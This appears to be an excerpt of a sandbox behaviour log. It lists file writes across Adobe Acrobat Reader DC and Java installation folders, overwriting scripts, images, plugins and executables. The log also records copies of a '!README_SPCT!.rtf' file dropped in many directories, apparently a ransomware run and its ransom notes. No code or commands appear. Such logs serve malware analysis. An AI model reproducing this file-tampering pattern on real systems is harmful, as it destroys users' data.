| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\ui-strings.js | size = 5251 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png | size = 3139 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_retina_thumb_highContrast_bow.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ru-ru\ui-strings.js | size = 5893 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png | size = 1722 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\config.js | size = 2843 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png | size = 8371 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png | size = 1713 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-tw\ui-strings.js | size = 4874 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png | size = 1692 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif | size = 1474 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\ui-strings.js | size = 8633 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\ui-strings.js | size = 9466 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\da-dk\ui-strings.js | size = 5062 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\ui-strings.js | size = 5147 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js | size = 4984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js | size = 5526 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\load-typekit.js | size = 2853 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | size = 1714 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js | size = 2686 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | size = 1474 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif | size = 1472 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js | size = 4984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js | size = 8271 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js | size = 5174 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js | size = 5287 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js | size = 9182 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | size = 1873 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css | size = 2218 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js | size = 8633 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js | size = 9583 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js | size = 8983 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css | size = 9527 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js | size = 3249 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js | size = 8848 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\tr-tr\ui-strings.js | size = 9413 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png | size = 2119 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png | size = 2119 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_pattern_RHP.png | size = 1595 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\ui-strings.js | size = 3239 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js | size = 3275 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\javaws.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\ui-strings.js | size = 3205 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.password.template | size = 4272 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js | size = 3280 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js | size = 3264 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js | size = 3308 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js | size = 3172 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js | size = 3148 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\ui-strings.js | size = 3876 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_2x.png | size = 2027 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\ui-strings.js | size = 3347 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png | size = 1713 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js | size = 3280 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js | size = 3230 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js | size = 3143 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif | size = 2610 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif | size = 1994 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | size = 2378 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif | size = 2577 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\warning_2x.png | size = 2719 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js | size = 9047 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | size = 4311 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\ui-strings.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png | size = 1861 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json | size = 1683 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | size = 1479 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png | size = 2027 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RTC.der | size = 2514 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js | size = 2555 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif | size = 2029 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_sent.gif | size = 2325 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | size = 16384 |
|
1 | |
